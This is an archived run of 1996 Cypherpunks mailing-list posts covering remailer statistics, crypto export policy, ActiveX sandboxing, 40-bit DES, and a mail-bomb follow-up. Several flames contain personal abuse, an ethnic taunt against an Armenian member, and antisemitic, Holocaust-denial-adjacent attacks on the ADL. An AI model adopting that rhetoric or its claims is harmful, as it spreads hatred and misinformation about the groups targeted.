balls    remailer@huge.cajones.com        #****+******    27:28  93.99%
mix      mixmaster@remail.obscura.com     -._.-.-++*    8:44:55  92.01%
nym      config@nym.alias.net             #*###+#*#+       2:53  84.35%
extropia remail@miron.vip.best.com        . --__..     25:50:51  79.18%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 16 Dec 1996 07:36:45 -0800 (PST)
To: rcgraves@ix.netcom.com
Subject: Re: Carto international money-laundering/embezzlement case
In-Reply-To: <199612160751.XAA03800@dfw-ix4.ix.netcom.com>
Message-ID: <32B56C24.260F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


rcgraves@ix.netcom.com wrote:
> Dale Thorn <dthorn@gte.net> wrote:
> Apologies for replying to a crank whom most people are already ignoring,
> but I've got lots of material relating to the case of Legion v. Carto,
> which Dale summarizes quite wrongly, at
> http://www-leland.stanford.edu/~llurch/potw2/legion/

Sure, I'm a crank, and, you're an asshole.  I never said Carto was a
swell guy, but, you ignore the real facts in a case pitting the ADL
against its worst enemy.  Maybe you should real the L.A. Times once
in a while, you ignorant jerk.

> Cypherpunk relevance: HUGE. Money laundering, reputation control, data and
> tax havens, libertarian and Nazi fantasies, criminal cults, and a dog named
> Fido. Judge Maino:

> |     I believe that I could appoint a platoon of lawyers and accountants
> | to look into this case and I would still not be much closer to answering
> | the following questions than I am today.

> Far from Dale's preoccupation with "international joo interests," it's a
> case of two neo-Nazi groups suing each other over the mismanagement of an
> inheritance.

Contrary to your armchair experience, stupid, I went there and saw the
people, and I've also been studying them for 10 years or so.  The gang
that took over the IHR were neo-Nazis?  Yeah, and I'm the Pope.

> Stir in a little CoS interest (they want to cover up
> Marcellus's involvement with Holocaust denial and to associate recent legal
> actions against the cult in Germany with the Holocaust), and it's a
> veritable cornucopia of fruitcakes bashing each other, all over money for
> which no clear accounting can be made because it was always kept at least
> partly underground.

Like all fruitcakes, you ignore facts and wave your arms around and
fill the air with noise.  Many big-media outlets have made it clear
that Carto is the #1 enemy of the ADL et al, and, just like someone
bombed (!) the IHR in Torrance in the 1980's, they gutted the one in
Costa Mesa in 1993.

The real story is obviously over your head, which you can now go back
and stick in the sand.  And remember, don't you dare research ANYthing
about the Holocaust etc. unless you get approval from the ADL first.
The ADL, just more lying scumbags themselves, who *suppressed* Jewish
dissent during the 1930's in the U.S.  Why?  Because it was good for
business.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Dec 1996 04:56:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: NYT: Faulty Crypto Policy
Message-ID: <1.5.4.32.19961216125254.0067e118@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, December 16, 1996, p. A14.

   Another Faulty Encryption Policy [Editorial]

   The Clinton Administration has issued its third plan in as
   many years to keep powerful encryption programs for
   telephone and computer messages out of the hands of
   international terrorists and criminals. But this latest
   plan to control the export of encryption software, like the
   two before it, is unworkable and risks trampling on privacy
   rights and harming American software firms.

   Encryption in the hands of criminals unquestionably makes
   law enforcement hard. But the greatest use of encryption is
   by banks and other legal businesses that need to transmit
   confidential data without fear of interception. In
   legitimate hands, encryption helps to prevent crime.

   The Administration first sought to steer all Americans
   toward an encryption standard that Washington would design,
   thus preserving the Government's ability to tap phone
   calls. But after sharp criticism of Government snooping,
   the Administration retreated to a policy, still rejected by
   most privacy advocates and software firms, aimed at exports
   of encryption programs. The newly released regulations,
   which were supposed to implement the October policy, in
   fact make a flawed policy even worse.

   The one consistent thread through the Administration's
   plans is commitment to an encryption standard that uses
   mathematical "passwords" to scramble messages. The
   Government would then have the technical capacity to
   recover passwords, upon court order, and unscramble the
   phone or computer message.

   But the new policy will not succeed abroad. The
   Administration insists it needs not only to unscramble
   stored computer files but also to tap phone and computer
   messages, without the caller's knowledge, as they are
   transmitted. That would in effect require the foreign
   purchaser of American software to deposit its passwords
   with a reputable outside party -- a government agency, a
   bank or the computer firm from which it bought the software
   -- which would relinquish them upon court order and without
   notifying the user. What foreign company or individual will
   purchase software that is prey to undisclosed Government
   snooping when they can, buy equally powerful encryption
   from foreign firms that offer no such path for
   eavesdropping?

   The plan runs into other insolvable problems. It does not
   propose prohibiting powerful encryption software for
   domestic purchase, where such programs are constitutionally
   protected and already in wide use. Thus anyone could, with
   a few key strokes, send the domestically available programs
   over the Internet to Europe and beyond.

   The Administration also fears that software firms will
   write their programs so that the powerful domestic versions
   communicate readily with the easier-to-tap export products.
   If so, the technical result would be that criminals here
   and abroad could communicate out of reach of Government
   wiretaps. The Administration proposes to solve that problem
   by prohibiting software firms from providing easy
   communication between their domestic and export products.
   But that would make American export encryption programs
   unsellable abroad.

   A panel of the National Research Council recommended that
   Washington drop export restrictions on encryption software
   already available abroad, beef up the F.B.I.'s ability to
   crack private encryption codes and support private efforts
   to develop high quality encryption to stop illegal
   eavesdropping. Those steps will improve communications
   security and will not put Government law officers in
   corporate boardrooms, open E-mail to instant wiretaps or
   send foreign customers toward European and Asian software
   firms.

   [End]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Dec 1996 05:25:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: FER_mat
Message-ID: <1.5.4.32.19961216132150.00681378@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


12-16-96. NYP Book review:

  Fermat's Last Theorem:
    Unlocking the Secret of an Ancient Mathematical
    Problem
  By Amir D. Aczel

The world has many worlds, with the priestly cult 
of mathematicians, so mystifyingly and inaccessible 
to most people, among the more esoterically 
interesting of them. Aczel describes the intrigue
and double-dealing in the international world of
mathematical speculation, some of which involves
Andrew Wile's proof of Fermat's theorem.

-----

FER_mat

----------

The NYP reported on Wile's proof in January, 1995:

http://jya.com/fermhak.txt  (15 kb)

FERM_hak





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Dec 1996 06:10:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: SAV_eit
Message-ID: <1.5.4.32.19961216140703.0067d0c0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 12-16-96. NYP:

 "Global Debate Over Treaties On Copyright"

 Given the overwhelming domestic objections to most of the
 treaty proposals, the obvious questions are: Who does
 support them? And why is the United States pushing so hard
 for them in Geneva?

 In fact, the main beneficiaries of the new copyright rules
 are the highest-stake copyright holders: rich, politically
 powerful entertainment and media conglomerates, which fear
 that pirated material will destroy the lucrative
 international market for products that can be digitally
 copied and distributed globally.

 In the digital world, computer software companies are
 already effectively using various data encryption
 technologies to protect their products for distribution
 over the network. And if progress to date is any
 indication, these technologies will become even more
 sophisticated and effective over time.

-----

 SAV_eit





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 16 Dec 1996 06:30:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITARs effects
Message-ID: <199612161430.GAA20178@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


azur@netcom.com (Steve Schear) writes:
> >Adam Shostack writes:

> [snip]
> > In my case the
> >government's lawyer has made it quite clear that they would consider
> >putting cryptographic software on a web site as a violation, and I
> >don't think that for this purpose there is any distinction either in
> >the government's mind or in reality between an FTP site and a web
> >site.
> >
> 
> These changes are all aimed at making it harder to make money from strong
> crypto and therefore reduce its common availability worldwide. They do
> little  to keep it from circulating worlwide, what ever its country of
> origin as anonymous posting to a newsgroup is still straightforward.
> 
> Look for more shareware and commercial crypto source to circulate in
> printed, rather than machine-readable, form to take advantage of freedom of
> speech rules.
> 
> -- Steve

>From the proposed regs:
-----------------------

16. Section 734.7 is amended by revising paragraph (b) to read as
follows: 

734.7 Published information and software. 

                                          * * * * * 
Accordingly, such
encryption software in both source code and object code remains
subject to the EAR even if published in a book or any other writing                   
or media.          ^^^^^^^^^^^^^^^^^^^^^^^^^^^

------------------------

Peter Trei
trei@Process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Dec 1996 07:42:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP
In-Reply-To: <9612160514.AA12168@cow.net>
Message-ID: <VJa2yD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bovine Remailer <haystack@cow.net> writes:
> >admit that HP (for example) is the best, reliability-wise, yet I have
> >purchased quite a few of their computers and major peripherals over the
> >past 20 years, and I have experienced an approximate 40% (!) defective
> >rate during the one-year warranty period, more than 30% falling within
> >the first three months.
>
> Dale, perhaps it's time for you to seek out a new career.
> Check that LA "Not a real paper" Times for things like
> "car wash assistant needed" and good luck.

HP 9000's are great boxes, but they break down and need maintenance.
That's to be expected. You, anonymous coward, are an ignorant asshole
and a typical "cypher punk".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Mon, 16 Dec 1996 06:41:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Zerofaith/Mail Bomb (fwd)
Message-ID: <m0vZeEZ-0001LQC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


All...

flagg@nlights.net enscribed thusly:
> From nlights.net!flagg Mon Dec 16 02:56:39 1996
> Date: Sun, 15 Dec 1996 23:57:28 -0800 
> From: flagg@nlights.net
> Message-Id: <TCPSMTP.16.12.15.-9.57.28.2446633616.3387407@nlights.net>
> Subject: Zerofaith/Mail Bomb
> To: mhw@wittsend.com


> After examining the header to the email bomb you recieved, it was
> determined that the person was not "MARLA ESTES" but a user named
> "Eradicator".  The date is off by one day in the header file, check it
> out, (though we do keep logs of the ppp logons).

	Well...  I was close...  :-)  Only excuse I've got for missing that
one little detail is that it was late...  Good thing she didn't have a message
pop-up.  Hate collateral damage.

> Eradicators account was removed as well as "Zerofaiths" and another
> alias he hides under, "Kobra".

	This was quick action after we had managed to identify roughly
where the nonsense was originating.  These guys did good.

> If you have any questions, feel free to call me voice at 206-259-6417,
> or email back.  I have no problem giving out the information we have to
> you.

> Mike Carpenter
> Delivered from Northern Lights BBS, Everett, WA. 

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 16 Dec 1996 06:57:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
Message-ID: <199612161457.GAA20796@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Walt Armour <walt@blarg.net>
> To:            "'Matthew Ghio'" <ghio@myriad.alias.net>
> Cc:            "cypherpunks@toad.com" <cypherpunks@toad.com>
> Subject:       RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
> Date:          Fri, 13 Dec 1996 22:30:23 -0800

> There is no arguing that 40 bits is strong security.  I agree with that.
[...]
> As for security, the current release of PnC is primarily targetting 
> privacy, not security.  They are two very similar but different approaches. 
>  40 bits is sufficient to encrypt files and keep them away from friends, 
> family and coworkers (unless you work at the NSA).  The point of Point 'n 
> Crypt is to attempt to make encryption technology easily useable and 
> widespread.  If anything you have is of such a nature that 40 bits isn't 
> enough protection then by all means don't use PnC (at least not this 
> version :).
[...]
> later,
> walt

Would you mind telling us just how you expand the 40 key to the 56
bits needed for DES? (Security through obscurity has a bad rep on 
this list). For many  methods of doing so, 40bit DES is NOT
secure against a motivated individual's attack.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Mon, 16 Dec 1996 07:08:33 -0800 (PST)
To: peter.allan@aeat.co.uk
Subject: Re: Would you send money to Gary Rasmussen ?
Message-ID: <199612161507.KAA25225@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i have done a lot of business with Gary in the past, and recommend him 
without reservations.

	-paul

> From cypherpunks-errors@toad.com Fri Dec 13 18:15:33 1996
> Date: Fri, 13 Dec 96 19:54:50 GMT
> From: peter.allan@aeat.co.uk (Peter M Allan)
> To: 75542.1003@compuserve.com, cypherpunks@toad.com, jimg@mentat.com
> Subject: Would you send money to Gary Rasmussen ?
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1344
> 
> 
> 
> 
> 
> Gary Rasmussen (RagyR@aol.com) replies to me as below:
> 
> Have people got a view on the second question ?   I've had
> no contact with Gary before and he may very well be honest;
> but there's proper trust and there's stupidity.
> 
>    >    Hi Peter,
>    >    
>    >    >  I'm looking for Kahn's book. Have you an acccurate price now?
>    >    
>    >    A lot of copies (about 100) have been sold since ....
>    >    
>    >    
>    >    >  (And is there anyone I'd know who'd suggest I send you money ?!)
>    >    
>    >    Good question, but very hard to answer since I don't know who you
>    >    know. Can tell you that I operate Classical Crypto Books primarily as
>    >    a service for other members of the ACA. Two possible references are
>    >    the current and past ACA presidents:
>    >    
>    >    jimg@mentat.com (Jim Gillogly, ACA President 1996-1998)
>    >    75542.1003@CompuServe.COM (Randy Nichols, ACA President 1994-1996)
>    >    
>    >    Operating CCB is not my main occupation (by day I'm a scientist working
>    >    for MIT's Lincoln Lab). Can also say proudly that in 1.5 years of operating
>    >    CCB I haven't had any complaints.
>    >    
>    >    Please let me know if you have other questions or would like a complete
>    >    copy of the CCB catalog.
>    >    
>    >    Best Wishes,
>    >    Gary Rasmussen
>    >    Classical Crypto Books
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 16 Dec 1996 07:14:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Germany to regulate the Web.
Message-ID: <199612161514.HAA21232@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from the www-security list. Germany seems to 
want to:

1. Require blocking of German-verboten material.
2. Mandate content labling (PICS?)
3. Ban 'cookies'.
4. Require Digital Signatures on all net traffic. 

-pt
------- Forwarded Message Follows -------
Date:          Sun, 15 Dec 1996 23:48:32 -0800
To:            www-security@ns2.rutgers.edu
Subject:       Germany bans cookies! (and a whole lot more)
From:          nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)


web servers within Germany anyway... as of August 97... see below
 
 
               Germany Passes Sweeping Cyberspace Law 

               The German government approved a bill Wednesday aimed at
               regulating the Internet and protecting user privacy while banning
               smut, pro-Nazi content and online fraud. The so-called
               "multimedia law" essentially extends current German laws to the
               dominion of cyberspace, placing responsibility for suspect
               content on suppliers, but without clearly defining whether a
               supplier could also be construed to make a carrier -- such as an
               online service like CompuServe or AOL Bertelsmann Online --
               also liable. 

               The law is scheduled to take effect in August 1997, prior to the
               1998 deregulation of the European telecommunications market. 

               Under the law, online services could be held responsible for
               illegal material if they have the technology to block transmission
               of such content, and after notification, still disseminate the
               objectionable content. 

               The law also calls for content to be tagged electronically if
               unsuitable for minors to ensure it could be filtered out --similar
               to the V-chip television initiative in the U.S. The law would also
               prohibit "cookies" -- tiny programs that trace a user's path
               through the Net, recording what they visit, examine and
               purchase. Instead, the law would require that services give users
               the opportunity to use a site or service anonymously. 

               The German law also puts into place the idea of so called "digital
               signatures" -- a string of coded information which would clearly
               identify the origin of messages, files and images shipped via the
               Net. Such signatures would use a central authority to prevent
               fraudulent commercial transactions on the computer network by
               matching a publicly accessible data string with a confidential
               string of numbers, also called a key. 

www.mediacentral.com/Magazines/MediaDaily/Archive/1996121207.html/634827
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harondel J. Sibble" <sibble@infomatch.com>
Date: Mon, 16 Dec 1996 10:50:55 -0800 (PST)
To: Tim Scanlon <tfs@adsl-122.cais.com>
Subject: Re: Gov't Clarifes Position-Surprise!
Message-ID: <199612161850.KAA11938@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Dec 96 at 0:26, pgp-fone@rivertown.net wrote:

> Expect some form of cooperation with EC governments if this stuff goes
> through. The recent posting to cypherpunks about the "radikal" raid in the
> Netherlands is probably a good foreshadowing of this. If you have not seen the
> article, and want to, I will be happy to remail it.
> 
> 
> Tim Scanlon
> 

Tim, please send me the article when you have a moment, thanks! 
> 

Cheers

Harondel J. Sibble (aka The Juice-Meister)
homepage >> http://ourworld.compuserve.com/homepages/Harondel_Sibble/
email >> sibble@infomatch.com or 75301.157@compuserve.com
PGP public key >> finger sibble@infomatch.com 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sun, 15 Dec 1996 14:33:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Chek it out
In-Reply-To: <199612150434.WAA02196@unix.newnorth.net>
Message-ID: <199612152232.LAA13462@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Dec 1996 22:34:58 -0600 (CST), some idiot wrote:

>   www.geocities.com/SiliconValley/Heights/2608
>   It's Kool, but still under construction.

It's extremely un-"Kool" to post so many (i.e., more than 0) copies of
this crap.

Why is cypherpunks the dumping ground for every spotty Herbert's "ChEk
Out mY WaY-KoOl RaDiCaL WeBSItE DoOdZ!" ads? :-(

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Power, n:
	The only narcotic regulated by the SEC instead of the FDA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 16 Dec 1996 08:42:27 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Java DES breaker?
In-Reply-To: <2RHyyD6w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961216114306.15110A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> The great Russian-Scottish poet Mikhail Yur'evich Lermotov said the following
> about the likes of Ray "Arsen" Arachelian:  "Ty trus, ty rab, ry armyanin."

Clearly, it is impossible to communicate with you on any sane level, I 
think I will give up on you now.  I mean, just what's the point?  In the 
words of James Tiberius Kirk "Beam me up Scotty, no intelligent life down 
here."

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 16 Dec 1996 09:35:22 -0800 (PST)
To: ichudov@algebra.com
Subject: Securing ActiveX.
In-Reply-To: <199612150049.SAA00282@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961216123313.15110L-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Dec 1996 ichudov@algebra.com wrote:

> Ray Arachelian wrote:
> > 
> > Until Microsoft secures ActiveX in it's own sandbox and doesn't allow it 
> > to access things it shouldn't, it's not cool.
> > 
> 
> I do not understand how one can secure ActiveX.

Simple.  Check out Windows NT, under NT you can write/run programs as 
services which log in as an account.  When you do this, that service 
program is limited to the security restrictions of that account.

If you're using the NTFS file system and give that account access only to 
one directory, it can't access anything but that directory.  (If you're 
using FAT, this isn't true and the program can read/write/delete anything 
it wants.)  Works quite well.

It can be done under 95 but Microsoft will have to write a Sandbox 
Virtual Machine (a Virtual x86 session whose API's are filtered to 
prevent access to certain things like the file system, and disables 
direct I/O.)  Not that easy under '95, but it already exists for NT.

The problem is how to deal with DLL's.  You don't know all 
features/functions of all DLL's.  It may be possible to write a DLL that 
runs outside the sandbox and can act as a proxy to the file system, so 
it's iffy unless you limit the DLL's and services that ActiveX apps talk 
to, and make them all live inside the sandbox.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Mon, 16 Dec 1996 14:38:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: U.S.S. Liberty
Message-ID: <199612162124.NAA19818@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim C. May is another loser who pays for got.net because he lacks the mental 
capacity to gain net access as a perk of either employment or academic 
achievment.

     o)__
    (_  _`\ Tim C. May
     z/z\__)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Mon, 16 Dec 1996 10:30:02 -0800 (PST)
To: "Cypherpunks" <walt@blarg.net>
Subject: [QUERY]Point-n-Crypt URL  (???)
Message-ID: <n1361379463.43758@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


To avoid flame wars, I know "...40-bit DES is not secure."  I'm just 
interested in the interface, etc.  Unfortunately, I lost the URL of where to 
DL a demo.  Could someone please forward me this information?

Thanks!

PM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Casey Iverson <iverson@usa.net>
Date: Mon, 16 Dec 1996 11:18:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.16.19961216135505.2b4f38ca@pop.netaddress.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AaronH4321@aol.com
Date: Mon, 16 Dec 1996 11:08:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Van Eck articles, reply..
Message-ID: <961216140723_908273951@emout01.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I went to the library and found an article on Van Eck. I posted it at my
site. It was a little long to e-mail. Check it out at:

  http://members.aol.com/aaronh4321/vaneck.html

If anyone has more current information please e-mail me.

Aaron....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Mon, 16 Dec 1996 14:32:32 -0800 (PST)
To: coderpunks@toad.com
Subject: Army Cryptanalysis manual online
Message-ID: <3.0.32.19961216143128.00e39590@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


The US Army's Field Manual on Basic Cryptanalysis (FM 34-40-2), dated
September 1990 is available for downloading as an Acrobat PDF file from:

http://www.atsc-army.org/cgi-win/$atdl.exe/fm/34-40-2/default.htm

Fairly classic in nature (substitution, transposition, and code systems).
Huge files (so far, at 28.8, after about an hour and a half, I've only been
able to grab the table of contents and a couple of appendices - some
kind-hearted person with a T1 or greater may want to get everything, then
zip and mirror to save us bandwidth challenged folks the pain).

Also, for the complete listings of almost 300 downloadable FMs through the
Army's
Digital Training Library (ATDL), check out:

http://www.atsc-army.org/cgi-win/$atdl.exe?type=fm&header=%2Fatdl%2Fbrowse%2
Ffm.htm

Have fun!

Joel

Note: This site isn't wholly reliable.  It seems to regularly go up and
down, and sometimes the bandwidth is terrible.  Probably worth your
patience though.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Mon, 16 Dec 1996 14:52:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Securing ActiveX.
In-Reply-To: <01BBEB6C.A6148AA0@bcdev.com>
Message-ID: <v03007805aedb7d667ad1@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Blake Coverett <blake@bcdev.com> wrote:
[...]
>Digitally signed code, a la ActiveX, is another approach to the same
>problem.
>If the digital signatures and infrastructure around them are sound, which
>they
>appear to be for ActiveX, this is also a useful solution.  The built-in
>gotcha
>with this model is the all or nothing nature, either I trust the software
>publisher  to run arbitrary native code on my machine or I don't run it at
>all.

The other problem is that the proposed Authenticode system and other "signed
applet" systems only provide accountability after the fact.  This is little
help when your hard drive is toast and the only proof you had was a logfile
which was the first thing erased...  The illusion that only "trusted software
puslishers" will be given blanket authorization is a pipe dream: users are
sheep who will hit that "OK" dialog box as many times as necessary to get the
tasty treat they are anticipating (and there is actual experimental evidence
to back this up :)  I expect that the first post-Authenticode ActiveX virus
will be one to modify the signature checking routines or add additional keys
to the registry which makes the second round of the attack appear to be a
valid OS update from Microsoft. What exactly does a signature get you other
than someone to point a finger at?  In case you don't read those legal weasel
words in software licenses there is no claim made that the product will work
as intended and the company does warn you that if the product fries your
disk then it is not their fault...

>Specify technical issues follow:
>
>> It can be done under 95 but Microsoft will have to write a Sandbox
>> Virtual Machine (a Virtual x86 session whose API's are filtered to
>> prevent access to certain things like the file system, and disables
>> direct I/O.)  Not that easy under '95, but it already exists for NT.
>
>But of course it's not enough to filter out filesystem calls.  The entire
>windowing system would have to be separated as well.  For example
>a rogue control might watching all edit controls for ones
>that have the ES_PASSWORD style and grabbing the contents.
>
>An equivalent Unix problem would be to allow an open-access guest
>account with the ability to transfer in and execute arbitrary binaries.
>While doing this securely may be possible in theory I don't think the
>state of the art is up to it today.  (I sure wouldn't allow it on my system.)

The state of the art was up to it quite a while ago.  Check out KeyKOS and
other OSes which use capability semantics for access control.  Rather than
the all or nothing approach to security which is currently built into Java
and continued with the code signing initiatives (albeit allowing you to
delegate responsibility regarding trust) what is needed is to extend the
signatures to granting the capability to perform a certain task and nothing
more.  If the signature could express things like "this ActiveX control
needs access to a writable file in C:\WINDOWS\TEMP which will not exceed
1 Megabyte in size" then the system would be flexible enough to succeed
and would allow users to express much more complex trust relationships than
the simple boolean expressions which current code signing mechanisms allow.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 16 Dec 1996 14:58:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: unsubscirbe
In-Reply-To: <32B5BE8B.6E1E@ma.ultranet.com>
Message-ID: <v03007800aedb851f75c7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:26 PM -0500 12/16/96, Andrew Fairbanks wrote:
>would someone please take me off the list
>apf@ma.ultranet.com
>
>Thankyou

OK, as you requested, you have been "unsubscirbed."

If you were looking to unscribe, unsuscrive, unsribe, or unsuscribe, I
can't help you.

Finally, if you were looking to unsubscribe, you should surely know by now
that members of the list cannot do this for you. The instructions have been
posted _many_ times just in the last few weeks, and follow again below.

--Tim May, Chief Unscriber and Unsuscurber



To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Mon, 16 Dec 1996 12:24:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: PUBLIC: Citibank Visa & the FBI
Message-ID: <199612162024.PAA25404@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


sometime ago, i saw a thread about citibank giving someone, i think it was the fbi, some visa account 
information to use in a sting opereation.
will someone please give me a pointer to this thread?

cheers,
	-paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
